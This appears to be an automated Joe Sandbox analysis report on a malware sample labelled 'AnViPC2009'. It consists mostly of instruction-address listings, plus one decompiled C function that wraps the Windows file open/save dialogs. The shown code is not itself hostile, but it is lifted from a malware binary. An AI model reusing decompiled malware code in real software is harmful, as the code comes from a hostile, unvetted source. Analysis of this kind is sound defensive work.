                                                                                                                                                  0x0040c09d
                                                                                                                                                  0x0040c0a8
                                                                                                                                                  0x0040c0ad
                                                                                                                                                  0x0040c0b6
                                                                                                                                                  0x0040c0bc
                                                                                                                                                  0x0040c0c1
                                                                                                                                                  0x0040c0c3
                                                                                                                                                  0x0040c22f
                                                                                                                                                  0x0040c235
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0c9
                                                                                                                                                  0x0040c0c9
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x0040c0d7
                                                                                                                                                  0x0040c0dd
                                                                                                                                                  0x0040c0e4
                                                                                                                                                  0x0040c194
                                                                                                                                                  0x0040c19b
                                                                                                                                                  0x0040c19d
                                                                                                                                                  0x0040c1a0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1a2
                                                                                                                                                  0x0040c1a9
                                                                                                                                                  0x0040c1af
                                                                                                                                                  0x0040c1b1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1b3
                                                                                                                                                  0x0040c1b3
                                                                                                                                                  0x0040c1b6
                                                                                                                                                  0x0040c1b7
                                                                                                                                                  0x0040c1bf
                                                                                                                                                  0x0040c1ce
                                                                                                                                                  0x0040c1d0
                                                                                                                                                  0x0040c1da
                                                                                                                                                  0x0040c1dc
                                                                                                                                                  0x0040c1df
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1b9
                                                                                                                                                  0x0040c1bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1e1
                                                                                                                                                  0x0040c1ef
                                                                                                                                                  0x0040c1f5
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c1f9
                                                                                                                                                  0x0040c1fe
                                                                                                                                                  0x0040c200
                                                                                                                                                  0x0040c20d
                                                                                                                                                  0x0040c20d
                                                                                                                                                  0x0040c200
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c1f7
                                                                                                                                                  0x0040c1df
                                                                                                                                                  0x0040c1b1
                                                                                                                                                  0x0040c0ea
                                                                                                                                                  0x0040c0ef
                                                                                                                                                  0x0040c0f2
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0f8
                                                                                                                                                  0x0040c106
                                                                                                                                                  0x0040c112
                                                                                                                                                  0x0040c11e
                                                                                                                                                  0x0040c123
                                                                                                                                                  0x0040c126
                                                                                                                                                  0x0040c129
                                                                                                                                                  0x0040c13c
                                                                                                                                                  0x0040c145
                                                                                                                                                  0x0040c14a
                                                                                                                                                  0x0040c14c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c152
                                                                                                                                                  0x0040c160
                                                                                                                                                  0x0040c16e
                                                                                                                                                  0x0040c173
                                                                                                                                                  0x0040c175
                                                                                                                                                  0x0040c176
                                                                                                                                                  0x0040c180
                                                                                                                                                  0x0040c187
                                                                                                                                                  0x0040c18e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c18e
                                                                                                                                                  0x0040c12b
                                                                                                                                                  0x0040c132
                                                                                                                                                  0x0040c137
                                                                                                                                                  0x0040c13a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c213
                                                                                                                                                  0x0040c213
                                                                                                                                                  0x0040c21c
                                                                                                                                                  0x0040c222
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x0040c227
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c0ce
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c23f
                                                                                                                                                  0x0040c23f
                                                                                                                                                  0x0040c243
                                                                                                                                                  0x0040c262
                                                                                                                                                  0x0040c266
                                                                                                                                                  0x0040c270
                                                                                                                                                  0x0040c278
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c268
                                                                                                                                                  0x0040c27a
                                                                                                                                                  0x0040c27c
                                                                                                                                                  0x0040c28d
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c27e
                                                                                                                                                  0x0040c295
                                                                                                                                                  0x0040c2a0
                                                                                                                                                  0x0040c2a5
                                                                                                                                                  0x0040c2aa
                                                                                                                                                  0x0040c2ac
                                                                                                                                                  0x0040c2ae
                                                                                                                                                  0x0040c2ae
                                                                                                                                                  0x0040c2b3
                                                                                                                                                  0x0040c2b8
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x0040c2c3
                                                                                                                                                  0x0040c2c3
                                                                                                                                                  0x0040c2bc
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2cd
                                                                                                                                                  0x0040c2cd
                                                                                                                                                  0x0040c2d1
                                                                                                                                                  0x0040c2e1
                                                                                                                                                  0x0040c2e1
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2ec
                                                                                                                                                  0x0040c2ec
                                                                                                                                                  0x0040c2f0
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c2f6
                                                                                                                                                  0x0040c2f6
                                                                                                                                                  0x0040c2fd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c303
                                                                                                                                                  0x0040c303
                                                                                                                                                  0x0040c30a
                                                                                                                                                  0x0040c310
                                                                                                                                                  0x0040c317
                                                                                                                                                  0x0040c319
                                                                                                                                                  0x0040c319
                                                                                                                                                  0x0040c320
                                                                                                                                                  0x0040c325
                                                                                                                                                  0x0040c32a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c330
                                                                                                                                                  0x0040c332
                                                                                                                                                  0x0040c334
                                                                                                                                                  0x0040c3ea
                                                                                                                                                  0x0040c3ea
                                                                                                                                                  0x0040c3ec
                                                                                                                                                  0x0040c350
                                                                                                                                                  0x0040c358
                                                                                                                                                  0x0040c35d
                                                                                                                                                  0x0040c35f
                                                                                                                                                  0x0040c366
                                                                                                                                                  0x0040c36b
                                                                                                                                                  0x0040c36d
                                                                                                                                                  0x0040c36f
                                                                                                                                                  0x0040c373
                                                                                                                                                  0x0040c375
                                                                                                                                                  0x0040c375
                                                                                                                                                  0x0040c373
                                                                                                                                                  0x0040c380
                                                                                                                                                  0x0040c38c
                                                                                                                                                  0x0040c39c
                                                                                                                                                  0x0040c3a6
                                                                                                                                                  0x0040c3b5
                                                                                                                                                  0x0040c3bb
                                                                                                                                                  0x0040c3c3
                                                                                                                                                  0x0040c3c8
                                                                                                                                                  0x0040c3ca
                                                                                                                                                  0x0040c3df
                                                                                                                                                  0x0040c3df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3ca
                                                                                                                                                  0x0040c3f2
                                                                                                                                                  0x0040c3f2
                                                                                                                                                  0x0040c3f4
                                                                                                                                                  0x0040c400
                                                                                                                                                  0x0040c400
                                                                                                                                                  0x0040c412
                                                                                                                                                  0x0040c418
                                                                                                                                                  0x0040c41a
                                                                                                                                                  0x0040c420
                                                                                                                                                  0x0040c427
                                                                                                                                                  0x0040c435
                                                                                                                                                  0x0040c43c
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c445
                                                                                                                                                  0x0040c44b
                                                                                                                                                  0x0040c452
                                                                                                                                                  0x0040c454
                                                                                                                                                  0x0040c45b
                                                                                                                                                  0x0040c460
                                                                                                                                                  0x0040c466
                                                                                                                                                  0x0040c467
                                                                                                                                                  0x0040c46b
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c479
                                                                                                                                                  0x0040c46b
                                                                                                                                                  0x0040c484
                                                                                                                                                  0x0040c486
                                                                                                                                                  0x0040c492
                                                                                                                                                  0x0040c494
                                                                                                                                                  0x0040c49a
                                                                                                                                                  0x0040c4a8
                                                                                                                                                  0x0040c4a8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c49a
                                                                                                                                                  0x0040c3f6
                                                                                                                                                  0x0040c3f6
                                                                                                                                                  0x0040c3fa
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c3fa
                                                                                                                                                  0x0040c33a
                                                                                                                                                  0x0040c33a
                                                                                                                                                  0x0040c33e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c344
                                                                                                                                                  0x0040c344
                                                                                                                                                  0x0040c347
                                                                                                                                                  0x0040c34a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c34a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b2
                                                                                                                                                  0x0040c4b3
                                                                                                                                                  0x0040c4b8
                                                                                                                                                  0x0040c4ba
                                                                                                                                                  0x0040c4bd
                                                                                                                                                  0x0040c4bd
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c4f3
                                                                                                                                                  0x0040c4f3
                                                                                                                                                  0x0040c4fa
                                                                                                                                                  0x0040c4fa
                                                                                                                                                  0x0040c4fd
                                                                                                                                                  0x0040c52a
                                                                                                                                                  0x0040c52a
                                                                                                                                                  0x0040c531
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c531
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c4ff
                                                                                                                                                  0x0040c502
                                                                                                                                                  0x0040c517
                                                                                                                                                  0x0040c517
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c51e
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c504
                                                                                                                                                  0x0040c505
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c507
                                                                                                                                                  0x0040c508
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c50e
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c57f
                                                                                                                                                  0x0040c57f
                                                                                                                                                  0x0040c583
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c589
                                                                                                                                                  0x0040c589
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c727
                                                                                                                                                  0x0040c727
                                                                                                                                                  0x0040c72b
                                                                                                                                                  0x0040c72d
                                                                                                                                                  0x0040c734
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c740
                                                                                                                                                  0x0040c746
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c74e
                                                                                                                                                  0x0040c753
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c75f
                                                                                                                                                  0x0040c75f
                                                                                                                                                  0x0040c763
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c769
                                                                                                                                                  0x0040c769
                                                                                                                                                  0x0040c58b
                                                                                                                                                  0x0040c591
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c770
                                                                                                                                                  0x0040c774
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c77a
                                                                                                                                                  0x0040c77a
                                                                                                                                                  0x0040c782
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c787
                                                                                                                                                  0x0040c78a
                                                                                                                                                  0x0040c7af
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78c
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7a6
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c791
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c79d
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c794
                                                                                                                                                  0x0040c792
                                                                                                                                                  0x0040c78f
                                                                                                                                                  0x0040c7bd
                                                                                                                                                  0x0040c7c4
                                                                                                                                                  0x0040c7cb
                                                                                                                                                  0x0040c7d2
                                                                                                                                                  0x0040c7d7
                                                                                                                                                  0x0040c7de
                                                                                                                                                  0x0040c81f
                                                                                                                                                  0x0040c828
                                                                                                                                                  0x0040c82d
                                                                                                                                                  0x0040c82f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c831
                                                                                                                                                  0x0040c831
                                                                                                                                                  0x0040c833
                                                                                                                                                  0x0040c83a
                                                                                                                                                  0x0040c840
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c842
                                                                                                                                                  0x0040c844
                                                                                                                                                  0x0040c847
                                                                                                                                                  0x0040c84e
                                                                                                                                                  0x0040c850
                                                                                                                                                  0x0040c857
                                                                                                                                                  0x0040c85a
                                                                                                                                                  0x0040c85f
                                                                                                                                                  0x0040c861
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c893
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c863
                                                                                                                                                  0x0040c865
                                                                                                                                                  0x0040c868
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87c
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c87d
                                                                                                                                                  0x0040c882
                                                                                                                                                  0x0040c883
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c889
                                                                                                                                                  0x0040c88a
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c88f
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86a
                                                                                                                                                  0x0040c86d
                                                                                                                                                  0x0040c86e
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c874
                                                                                                                                                  0x0040c849
                                                                                                                                                  0x0040c849
                                                                                                                                                  0x0040c84c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c895
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c896
                                                                                                                                                  0x0040c89b
                                                                                                                                                  0x0040c89d
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x0040c89f
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x0040c7e0
                                                                                                                                                  0x0040c7e7
                                                                                                                                                  0x0040c7f5
                                                                                                                                                  0x0040c7fc
                                                                                                                                                  0x0040c801
                                                                                                                                                  0x0040c803
                                                                                                                                                  0x0040c809
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c815
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a2
                                                                                                                                                  0x0040c8a9
                                                                                                                                                  0x0040c8b2
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8b9
                                                                                                                                                  0x0040c8c5
                                                                                                                                                  0x0040c8d4
                                                                                                                                                  0x0040c8db
                                                                                                                                                  0x0040c8e7
                                                                                                                                                  0x0040c8ec
                                                                                                                                                  0x0040c8f3
                                                                                                                                                  0x0040c8fc
                                                                                                                                                  0x0040c908
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c90f
                                                                                                                                                  0x0040c91b
                                                                                                                                                  0x0040c922
                                                                                                                                                  0x0040c927
                                                                                                                                                  0x0040c92e
                                                                                                                                                  0x0040c934
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c936
                                                                                                                                                  0x0040c94a
                                                                                                                                                  0x0040c94f
                                                                                                                                                  0x0040c956
                                                                                                                                                  0x0040c95b
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x0040c96e
                                                                                                                                                  0x0040c97a
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c95f
                                                                                                                                                  0x0040c95f
                                                                                                                                                  0x0040c965
                                                                                                                                                  0x0040c96a
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c97f
                                                                                                                                                  0x0040c98a
                                                                                                                                                  0x0040c996
                                                                                                                                                  0x0040c998
                                                                                                                                                  0x0040c99a
                                                                                                                                                  0x0040c9a3
                                                                                                                                                  0x0040c9aa
                                                                                                                                                  0x0040c9ac
                                                                                                                                                  0x0040c9ae
                                                                                                                                                  0x0040c9b7
                                                                                                                                                  0x0040c9be
                                                                                                                                                  0x0040c9c0
                                                                                                                                                  0x0040c9c2
                                                                                                                                                  0x0040c9cb
                                                                                                                                                  0x0040c9d9
                                                                                                                                                  0x0040c9de
                                                                                                                                                  0x0040c9e5
                                                                                                                                                  0x0040c9e9
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x0040c9f7
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9e5
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c96c
                                                                                                                                                  0x0040c95d
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c9ff
                                                                                                                                                  0x0040c9ff
                                                                                                                                                  0x0040ca03
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x0040ca05
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c53d
                                                                                                                                                  0x0040c53d
                                                                                                                                                  0x0040c545
                                                                                                                                                  0x0040c54a
                                                                                                                                                  0x0040c54d
                                                                                                                                                  0x0040c573
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c54f
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x0040c567
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c554
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c55b
                                                                                                                                                  0x0040c552
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bfe1
                                                                                                                                                  0x0040bfe5
                                                                                                                                                  0x0040bfea
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff1
                                                                                                                                                  0x0040bff4
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040bff6
                                                                                                                                                  0x0040bff4
                                                                                                                                                  0x0040ca3e
                                                                                                                                                  0x0040ca3e
                                                                                                                                                  0x0040c61d
                                                                                                                                                  0x0040c624
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c62a
                                                                                                                                                  0x0040c62c
                                                                                                                                                  0x0040c633
                                                                                                                                                  0x0040c63a
                                                                                                                                                  0x0040c641
                                                                                                                                                  0x0040c681
                                                                                                                                                  0x0040c688
                                                                                                                                                  0x0040c691
                                                                                                                                                  0x0040c69d
                                                                                                                                                  0x0040c6ab
                                                                                                                                                  0x0040c6ab
                                                                                                                                                  0x0040c6b7
                                                                                                                                                  0x0040c6c5
                                                                                                                                                  0x0040c6cf
                                                                                                                                                  0x0040c6d6
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6e5
                                                                                                                                                  0x0040c6e5
                                                                                                                                                  0x0040c6e7
                                                                                                                                                  0x0040c6ec
                                                                                                                                                  0x0040c6f3
                                                                                                                                                  0x0040c6f8
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6f8
                                                                                                                                                  0x0040c6df
                                                                                                                                                  0x0040c643
                                                                                                                                                  0x0040c643
                                                                                                                                                  0x0040c64c
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c64e
                                                                                                                                                  0x0040c64e
                                                                                                                                                  0x0040c656
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c658
                                                                                                                                                  0x0040c661
                                                                                                                                                  0x00000000
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c663
                                                                                                                                                  0x0040c665
                                                                                                                                                  0x0040c66d
                                                                                                                                                  0x0040c674
                                                                                                                                                  0x0040c679
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c6fe
                                                                                                                                                  0x0040c702
                                                                                                                                                  0x0040c70f
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c711
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x0040c71b
                                                                                                                                                  0x00000000
                                                                                                                                                  0x0040c702

                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: DialogItemMessagePathTempText
                                                                                                                                                  • String ID: %s%s%d$@
                                                                                                                                                  • API String ID: 2494799851-3206671281
                                                                                                                                                  • Opcode ID: 77b2389bf64523cd01ad51e7ae423f08b149592db4e573d1bff172660f1ca29d
                                                                                                                                                  • Instruction ID: 48a93aca2e2bf8a60cc4dabb81976c404b686b8a4596ad806797bddee5965465
                                                                                                                                                  • Opcode Fuzzy Hash: 77b2389bf64523cd01ad51e7ae423f08b149592db4e573d1bff172660f1ca29d
                                                                                                                                                  • Instruction Fuzzy Hash: E441427180125CEEEB21EBA0CD88FDE77ACAB04308F0085B6E515E2181D7799B99CF55
                                                                                                                                                  Uniqueness

                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                  C-Code - Quality: 76%
                                                                                                                                                  			E00402810(intOrPtr _a4, intOrPtr _a8, char* _a12, intOrPtr _a16, char _a20) {
                                                                                                                                                  				intOrPtr _v28;
                                                                                                                                                  				intOrPtr _v32;
                                                                                                                                                  				CHAR* _v36;
                                                                                                                                                  				long _v48;
                                                                                                                                                  				char* _v52;
                                                                                                                                                  				char* _v68;
                                                                                                                                                  				intOrPtr _v72;
                                                                                                                                                  				intOrPtr _v76;
                                                                                                                                                  				char _v80;
                                                                                                                                                  				char _v592;
                                                                                                                                                  				char _v1616;
                                                                                                                                                  				void* _t39;
                                                                                                                                                  				intOrPtr _t43;
                                                                                                                                                  				signed int _t48;
                                                                                                                                                  				void* _t61;
                                                                                                                                                  				signed int _t63;
                                                                                                                                                  				void* _t65;
                                                                                                                                                  				char _t66;
                                                                                                                                                  				char* _t67;
                                                                                                                                                  				void* _t68;
                                                                                                                                                  				void* _t69;
                                                                                                                                                  				signed int _t76;
                                                                                                                                                  
                                                                                                                                                  				_t64 =  &_v592;
                                                                                                                                                  				if(_a16 != 0) {
                                                                                                                                                  					E0040A450( &_v592, _a16);
                                                                                                                                                  					_t68 = _t69 + E0040A35D(_t61,  &_v592) - 0x24b;
                                                                                                                                                  					E0040A450(_t68, _a16);
                                                                                                                                                  					_t64 = _t68 + E0040A35D(_t61, _t68) + 1;
                                                                                                                                                  				}
                                                                                                                                                  				E0040A450(_t64, E004098D0(0x85));
                                                                                                                                                  				_t65 = _t64 + E0040A35D(_t61, _t64) + 1;
                                                                                                                                                  				E0040A450(_t65, 0x4122e4);
                                                                                                                                                  				_t39 = E0040A35D(_t61, _t65);
                                                                                                                                                  				 *((char*)(_t39 + _t65 + 1)) = 0;
                                                                                                                                                  				_t66 = 0x4c;
                                                                                                                                                  				E0040A262(_t61,  &_v80, 0, _t66);
                                                                                                                                                  				_v76 = _a4;
                                                                                                                                                  				_t43 =  *0x414c78; // 0x400000
                                                                                                                                                  				_v72 = _t43;
                                                                                                                                                  				_v80 = _t66;
                                                                                                                                                  				_t67 = _a12;
                                                                                                                                                  				_v68 =  &_v592;
                                                                                                                                                  				_v52 = _t67;
                                                                                                                                                  				_v48 = 0x400;
                                                                                                                                                  				_v32 = _a8;
                                                                                                                                                  				if(E004073B4(_t67) == _t67) {
                                                                                                                                                  					GetCurrentDirectoryA(0x400,  &_v1616);
                                                                                                                                                  					_v36 =  &_v1616;
                                                                                                                                                  				}
                                                                                                                                                  				_v28 = 0x1080c;
                                                                                                                                                  				_push( &_v80);
                                                                                                                                                  				if(_a20 == 0) {
                                                                                                                                                  					_t48 = GetOpenFileNameA();
                                                                                                                                                  				} else {
                                                                                                                                                  					_t48 = GetSaveFileNameA();
                                                                                                                                                  				}
                                                                                                                                                  				_t63 = _t48;
                                                                                                                                                  				if(_t63 == 0) {
                                                                                                                                                  					_t48 = CommDlgExtendedError();
                                                                                                                                                  					if(_t48 == 0x3002) {
                                                                                                                                                  						 *_t67 = 0;
                                                                                                                                                  						_push( &_v80);
                                                                                                                                                  						if(_a20 == 0) {
                                                                                                                                                  							_t48 = GetOpenFileNameA();
                                                                                                                                                  						} else {
                                                                                                                                                  							_t48 = GetSaveFileNameA();
                                                                                                                                                  						}
                                                                                                                                                  						_t63 = _t48;
                                                                                                                                                  					}
                                                                                                                                                  					_t76 = _t63;
                                                                                                                                                  				}
                                                                                                                                                  				return _t48 & 0xffffff00 | _t76 != 0x00000000;
                                                                                                                                                  			}

























                                                                                                                                                  0x00402820
                                                                                                                                                  0x00402826
                                                                                                                                                  0x0040282e
                                                                                                                                                  0x0040283e
                                                                                                                                                  0x00402846
                                                                                                                                                  0x00402851
                                                                                                                                                  0x00402851
                                                                                                                                                  0x00402861
                                                                                                                                                  0x0040286c
                                                                                                                                                  0x00402876
                                                                                                                                                  0x0040287c
                                                                                                                                                  0x00402883
                                                                                                                                                  0x00402888
                                                                                                                                                  0x00402890
                                                                                                                                                  0x00402898
                                                                                                                                                  0x0040289b
                                                                                                                                                  0x004028a0
                                                                                                                                                  0x004028a9
                                                                                                                                                  0x004028ac
                                                                                                                                                  0x004028af
                                                                                                                                                  0x004028bb
                                                                                                                                                  0x004028be
                                                                                                                                                  0x004028c1
                                                                                                                                                  0x004028cb
                                                                                                                                                  0x004028d5
                                                                                                                                                  0x004028e1
                                                                                                                                                  0x004028e1
                                                                                                                                                  0x004028f1
                                                                                                                                                  0x004028f8
                                                                                                                                                  0x004028f9
                                                                                                                                                  0x00402903
                                                                                                                                                  0x004028fb
                                                                                                                                                  0x004028fb
                                                                                                                                                  0x004028fb
                                                                                                                                                  0x00402905
                                                                                                                                                  0x00402909
                                                                                                                                                  0x0040290b
                                                                                                                                                  0x00402916
                                                                                                                                                  0x0040291f
                                                                                                                                                  0x00402922
                                                                                                                                                  0x00402923
                                                                                                                                                  0x0040292d
                                                                                                                                                  0x00402925
                                                                                                                                                  0x00402925
                                                                                                                                                  0x00402925
                                                                                                                                                  0x0040292f
                                                                                                                                                  0x0040292f
                                                                                                                                                  0x00402931
                                                                                                                                                  0x00402931
                                                                                                                                                  0x0040293a

                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentDirectoryA.KERNEL32(00000400,?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 004028D5
                                                                                                                                                  • GetSaveFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 004028FB
                                                                                                                                                  • GetOpenFileNameA.COMDLG32(?,?,?,00000000,0000004C,?,?,004122E4,?,?,00000000,00000085,?,?), ref: 00402903
                                                                                                                                                  • CommDlgExtendedError.COMDLG32 ref: 0040290B
                                                                                                                                                  • GetSaveFileNameA.COMDLG32(?), ref: 00402925
                                                                                                                                                  • GetOpenFileNameA.COMDLG32(?), ref: 0040292D
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000008.00000002.588661727.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000008.00000002.588587394.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589528374.0000000000412000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.589763985.0000000000414000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590148104.000000000041E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  • Associated: 00000008.00000002.590310653.0000000000421000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_8_2_400000_Endermanch@AnViPC2009.jbxd
